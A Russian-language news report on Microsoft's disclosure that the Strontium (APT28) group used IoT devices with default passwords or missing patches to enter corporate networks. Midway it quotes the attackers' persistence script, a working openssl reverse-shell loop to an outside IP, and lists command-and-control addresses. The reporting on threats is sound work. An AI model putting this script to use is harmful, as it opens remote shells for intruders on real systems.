Новости
Дамир Камалетдинов

Microsoft рассказала об атаках русских хакеров на корпоративные сети через устройства «интернета вещей»

Целью стали VOIP-телефоны, офисные принтеры и видеодекодеры.

Специалисты Центра анализа угроз Microsoft обнаружили атаки на корпоративные сети через устройства «интернета вещей» со стороны группировки Strontium. В некоторых случаях хакерам даже не приходилось ничего взламывать: достаточно было ввести заводские пароли.

В Microsoft обнаружили как минимум три случая подобных атак. Злоумышленники пытались получить доступ к внутренней сети через VOIP-телефон, офисный принтер и видеодекодер. В двух случаях оказалось достаточно ввести заводской пароль, а на третьем устройстве не было установлено последнее обновление безопасности.

Устройства использовали в качестве точки входа. Через них хакеры проникли в сеть и начали сканировать её в поиске других незащищённых устройств с учётными записями с высокими привилегиями.

После получения доступа к каждому из устройств злоумышленники устанавливали скрипт для сниффинга (перехвата) трафика в локальной сети. При перемещении между устройствами хакеры также внедряли скрипт для укоренения в системе.

—contents of [IOT Device] file--

#!/bin/sh

export [IOT Device] ="-qws -display :1 -nomouse"

echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host

167.114.153.55 -port 443 |while : ; do sh && break; done| openssl

s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 &&

cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ];

then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &

--end contents of file--

скрипт для поддержания присутствия хакеров в сети

В Microsoft выяснили, что злоумышленники управляли устройствами с помощью удалённого сервера с IP-адресов 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251 и 128.199.199.187. Специалисты считают, что хакеры связаны с группировкой Strontium («Стронций»), также известной как Fancy Bear и APT28.

Эксперты по кибербезопасности и СМИ утверждают, что Fancy Bear связана с российским правительством. Группировке приписывают взлом демпартии США в 2016 году, попытки взломать американских чиновников и помешать европейским выборам в 2019 году.

Так как атаки на устройства «интернета вещей» Microsoft заметила на ранних стадиях, специалисты не установили конечную цель хакеров. Как отметили в компании, только за последние 12 месяцев сотрудники разослали 1400 уведомлений об атаках Strontium по всему миру. Большая часть целей относилась в государственной, IT, военной, оборонной, медицинской, образовательной и инженерной областям.

#хакеры #атаки #microsoft #новости